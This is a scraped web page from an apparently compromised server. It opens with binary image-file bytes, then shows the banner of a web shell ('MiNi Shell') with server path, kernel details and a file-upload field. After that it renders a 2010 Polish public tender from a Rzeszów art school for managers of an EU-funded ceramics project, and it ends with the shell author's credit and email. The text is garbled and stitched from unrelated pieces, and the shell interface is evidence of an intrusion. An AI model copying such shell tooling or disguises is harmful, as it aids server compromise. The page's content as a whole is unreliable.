JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368832-N-2010.html

<p class="kh_header"><b>Rzeszów: Wybór kadry zarządzającej projektem nr WND-POKL.09.02.00-18-041/10 pt. Heca z pieca!, realizowanym przez
Gminę Miasto Rzeszów/Zespół Szkół Plastycznych, w okresie od 25.11.2010 r. do 30.06.2012 r.,
współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 368832 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Plastycznych , ul. Staszica 16A, 35-051 Rzeszów, woj. podkarpackie, tel. 017 7482970, faks 017 7482980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsp.resman.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór kadry zarządzającej projektem nr WND-POKL.09.02.00-18-041/10 pt. Heca z pieca!, realizowanym przez
Gminę Miasto Rzeszów/Zespół Szkół Plastycznych, w okresie od 25.11.2010 r. do 30.06.2012 r.,
współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest - wybór kadry zarządzającej projektem nr WND-POKL.09.02.00-18-041/10 pt. Heca z pieca!, realizowanym przez Gminę Miasto Rzeszów/Zespół Szkół Plastycznych, w okresie od 25.11.2010 r. do 30.06.2012 r., współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
WSPÓLNY SŁOWNIK ZAMÓWIEŃ (CPV): 79421000-1 Usługi zarządzania projektem inne niż w zakresie robót budowlanych

1.	Dane dotyczące projektu:
1).	Informacje ogólne: Projekt pt. Heca z pieca!, w ramach którego realizowane będą:
- warsztaty ceramiczne mające na celu nauczenie uczniów i uczenic ZSP podstaw technologii ceramicznych (zapoznanie z różnymi technikami dotyczącymi modelowania, szkliwienia i wypału wyrobów ceramicznych). 
- cztery wyjazdy edukacyjne (Medynia Głogowska, Boguchwała, Nowy Wiśnicz, Wałbrzych)
- wyposażenie szkoły w nowoczesne narzędzia dydaktyczne.
Wymienione działania służą osiągnięciu celu głównego projektu, którym jest Podniesienie jakości oferty edukacyjnej Zespołu Szkół Plastycznych w Rzeszowie.
2).	Miejsce realizacji projektu: województwo podkarpackie
3).	Biuro projektu: Zespół Szkół Plastycznych w Rzeszowie, ul. Staszica 16a, pokój nr 030.
4).	Termin realizacji projektu: od dnia 25.11.2010 do 30.06.2012 r.
5).	Wartość projektu: 523 588,88 złotych..
1.	Szczegółowy opis przedmiotu zamówienia
Postępowanie ma na celu powierzenie obowiązków Koordynatora projektu i Asystenta Koordynatora projektu, stanowiących kadrę zarządzającą projektem określonym w ust. 1. Świadczenie usług zarządzania projektem odbywać się będzie na podstawie umowy - zlecenia i zostało podzielone na dwie części, tj.:
Część 1 - Koordynator projektu
Część 2 - Asystent Koordynatora projektu
Część 1 - Zakres usług świadczonych przez Koordynatora projektu:

Kierowanie   wykonaniem   projektu   w   formie   nadzoru   merytorycznego   i   finansowego   zgodnie z harmonogramem realizacji projektu. Wykonawca zobowiązany jest do realizacji niżej wymienionych zadań zapewniających wykonanie projektu:
a). nadzór nad całością prac związanych z realizacją projektu, ich jakością i terminowością oraz nad personelem projektu,
b). bieżący   kontakt   z   Instytucją   Pośredniczącą   i   innymi   organizacjami   lub   instytucjami zaangażowanymi bezpośrednio przy realizacji projektu,
c). komunikacja z personelem,

d). opracowanie Regulaminu rekrutacji i uczestnictwa w projekcie wraz z załącznikami, 
e). odbiór wykonywanej pracy przez innych Wykonawców,
f).  zarządzanie planowanymi działaniami projektowymi, 
g). przygotowanie wniosków o płatność,
h). kontakt z mediami,

i).  prowadzenie dokumentacji projektowej w oparciu o obowiązujące zapisy,

j).  organizacja i monitoring zadań wynikających z wniosku i harmonogramu projektu,

k).  organizacja dodatkowych elementów związanych z realizacją zajęć przewidzianych w ramach projektu, l).  nadzór nad bieżącą  dokumentacją projektu, hospitowanie zajęć
m). dokonywanie systematycznej kontroli pracy i uzyskanych efektów,

n). wprowadzanie zmian do projektu w oparciu o obowiązujące  zapisy zawarte w dokumentacji konkursowej, umowie o dofinansowanie projektu, dokumentacji programowych Programu Operacyjnego Kapitał Ludzki (POKL),
o). reprezentacja projektu na zewnątrz,

p). kontrola i nadzór nad monitoringiem realizacji projektu oraz sprawozdawczością  (kontrola terminów) w oparciu o obowiązujące zapisy w dokumentach programowych POKL,
q). codzienna   obecność    w   siedzibie   jednostki   realizującej   (Zespół   Szkół  Plastycznych w Rzeszowie).
r) terminowe bieżące i końcowe rozliczenie projektu
Wykonywanie zleconych zadań odbywać się  będzie w siedzibie Zamawiającego przez czas trwania umowy, w dni robocze tygodnia z wyłączeniem dni ustawowo wolnych od pracy. W przypadku kolizji świadczeń, świadczenia na rzecz Zamawiającego posiadają pierwszeństwo przed świadczeniami na rzecz osób trzecich.
Zamawiający zapewnia Wykonawcy: pomieszczenie biurowe, podstawowy sprzęt biurowy (komputer, drukarka,   kopiarka,   telefon),   dostęp   do   internetu,   podstawowe   materiały   biurowe   do   druku i korespondencji.

Część 2 - Zakres usług świadczonych przez Asystenta Koordynatora projektu:

a).	prowadzenie biura projektu,

b).	opracowanie,  wspólnie  z  Koordynatorem  projektu  regulaminów  rekrutacji  i  uczestnictwa w projekcie,
c).	prawidłowe przygotowanie wyjazdów edukacyjnych
d).	wykonywanie zadań składających się na proces rekrutacji BO,
e).	wprowadzenie informacji do bazy danych uczestników projektu (PEFS), f).	przygotowywanie wniosków o płatność,
g).	zamawianie i zakup sprzętu i materiałów, przygotowanie przetargów.

h).	przeprowadzanie monitoringu i ewaluacji,

i).	sporządzanie bieżącej dokumentacji projektu, 
j).	archiwizacja dokumentów projektowych,
k).	dystrybucja materiałów promocyjnych.
l). codzienna   obecność    w   siedzibie   jednostki   realizującej   (Zespół   Szkół  Plastycznych w Rzeszowie).

Wykonywanie  zleconych  zadań  odbywać  się  będzie  przez  czas  trwania  umowy,  w  dni  robocze tygodnia z wyłączeniem dni ustawowo wolnych od pracy. W przypadku kolizji świadczeń, świadczenia na rzecz Zamawiającego posiadają pierwszeństwo przed świadczeniami na rzecz osób trzecich. Zamawiający zapewnia Wykonawcy: pomieszczenie biurowe, podstawowy sprzęt biurowy (komputer, drukarka,   kopiarka,   telefon),   dostęp   do   internetu,   podstawowe   materiały   biurowe   do   druku i korespondencji.
2).   Wymagania stawiane Wykonawcy:

a).  należyta staranność przy realizacji umowy,

b).  zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowania oferty, 
c).  sprawdzenie i zweryfikowanie dostarczonych materiałów,
d).  niezwłoczne informowanie Zamawiającego o ewentualnych błędach lub przeoczeniach. Wykonawca jest zobowiązany do wykonywania zamówienia zgodnie ze wzorem umowy stanowiącym załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunki udziału w postępowaniu zostały spełnione na podstawie oświadczenia z art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania 1)W zakresie części 1 - Koordynatora projektu:

a).	wykształcenie wyższe,

b).	kwalifikacje  do  zajmowania  stanowisk  kierowniczych  w  szkole  lub  placówce  oświatowej potwierdzone dyplomem studiów podyplomowych z zakresu zarządzania oświatą i minimum 3 letni staż pracy na stanowisku kierowniczym w szkole,
c). przygotowanie pedagogiczne
d). znajomość i doświadczenie( minimum 5 lat) w zakresie specyfiki pracy w szkole artystycznej,

2).  W zakresie części 2 - Asystent koordynatora projektu:

a).	wykształcenie wyższe,

b).	przygotowanie pedagogiczne,
c).	ukończony kurs kierownika wycieczek,

d).	znajomość specyfiki pracy w szkole artystycznej,
e).	co najmniej 4-letnie doświadczenie  w pracy nauczyciela w szkole artystycznej.
Zamawiający oceni spełnienie tego warunku na podstawie:
1)Dokumenty potwierdzające wykształcenie, doświadczenie, kompetencje i umiejętności w zakresie części 1 - Koordynatora projektu:
a).	kserokopie dyplomów, świadectw i certyfikatów potwierdzających wykształcenie, kwalifikacje i umiejętności zawodowe,
b).	wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego załącznik nr 5/1.
2).  Dokumenty potwierdzające wykształcenie, doświadczenie, kompetencje i umiejętności w zakresie części 2 - Asystent koordynatora projektu:
a).	kserokopie dyplomów, świadectw i certyfikatów potwierdzających wykształcenie, kwalifikacje i doświadczenie zawodowe,
b).		wykaz osób, które będą wykonywać zamówienie wg wzoru stanowiącego załącznik nr 5/2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunki udziału w postępowaniu zostały spełnione na podstawie oświadczenia z art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunki udziału w postępowaniu zostały spełnione na podstawie oświadczenia z art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunki udziału w postępowaniu zostały spełnione na podstawie oświadczenia z art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.   Dokumenty wymagane w przypadku składania oferty wspólnej:

1). Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku dla ustanowionego  pełnomocnika  do  oferty należy  załączyć  pełnomocnictwo  do  reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
.   Reprezentacja i pełnomocnictwo.

1).  W	przypadku,   gdy   Wykonawcę    reprezentuje   pełnomocnik,   do   oferty   należy   dołączyć pełnomocnictwo podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres  umocowania).  Pełnomocnictwo  należy  złożyć  w oryginale  lub  kopii poświadczonej notarialnie za zgodność z oryginałem.
2).  W	przypadku	Wykonawców	składających 	wspólną 	ofertę, 	do	oferty	należy 	dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wystawione zgodnie z art. 23 ust. 2 ustawy). Treść  pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik	jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
3). Oferta oraz wszystkie złożone z  nią dokumenty i oświadczenia muszą być podpisane przez pełnomocnika osobę umocowaną do reprezentowania Wykonawcy/Wykonawców. Wszystkie kserokopie dokumentów załączone do oferty muszą zawierać oświadczenie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowi Załącznik nr 1 do SIWZ. W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla Zamawiającego warunki realizacji zamówienia.
Dopuszcza się w porozumieniu z Wykonawcą wprowadzenie do treści umowy drobnych zmian i korekt, jednak wyłącznie w zakresie niepowodującym zasadniczych zmian przedstawionych warunków handlowych niekorzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsp.resman.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Plastycznych w Rzeszowie: ul. Staszica 16a 35-051 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2010 godzina 10:30, miejsce: Zespół Szkół Plastycznych w Rzeszowie: ul. Staszica 16a 35-051 Rzeszów - w Sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w ramach projektu nr WND-POKL.09.02.00-18-041/10 pt. Heca z pieca!, realizowanym przez
Gminę Miasto Rzeszów/Zespół Szkół Plastycznych, w okresie od 25.11.2010 r. do 30.06.2012 r.,
współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com